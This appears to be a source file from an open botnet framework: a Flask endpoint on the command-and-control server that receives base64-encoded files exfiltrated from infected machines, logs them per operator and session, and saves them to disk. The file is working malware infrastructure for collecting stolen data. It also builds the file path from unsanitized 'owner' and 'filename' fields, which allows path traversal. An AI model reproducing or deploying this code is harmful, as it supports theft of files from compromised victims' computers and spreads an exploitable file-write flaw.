1
import os
2
import base64
3
import string
4
import random
5
from flask import Blueprint, request
6
from buildyourownbotnet.core import generators
7
from buildyourownbotnet.core.dao import file_dao
8

9

10
# Blueprint
11
files = Blueprint('files', __name__)
12

13

14
@files.route("/api/file/add", methods=["POST"])
15
def file_add():
16
	"""Upload new exfilrated file."""
17
	b64_data = request.form.get('data')
18
	filetype = request.form.get('type')
19
	owner = request.form.get('owner')
20
	module = request.form.get('module')
21
	session = request.form.get('session')
22
	filename = request.form.get('filename')
23

24
	# decode any base64 values
25
	try:
26
		data = base64.b64decode(b64_data)
27
	except:
28
		if b64_data.startswith('_b64'):
29
			data = base64.b64decode(b64_data[6:]).decode('ascii')
30
		else:
31
			print('/api/file/add error: invalid data ' + str(b64_data))
32
			return
33
	try:
34
		session = base64.b64decode(session)
35
	except:
36
		try:
37
			if session.startswith('_b64'):
38
				session = base64.b64decode(session[6:]).decode('ascii')
39
		except:
40
			pass
41

42
	# add . to file extension if necessary
43
	if not filetype:
44
		filetype = '.dat'
45
	elif not filetype.startswith('.'):
46
		filetype = '.' + filetype
47

48
	# generate random filename if not specified
49
	if not filename:
50
		filename = generators.variable(length=3) + filetype
51

52
	output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)
53

54
	# add exfiltrated file to database
55
	file_dao.add_user_file(owner, filename, session, module)
56

57
	# save exfiltrated file to user directory
58
	with open(output_path, 'wb') as fp:
59
		fp.write(data)
60

61
	return filename
62

63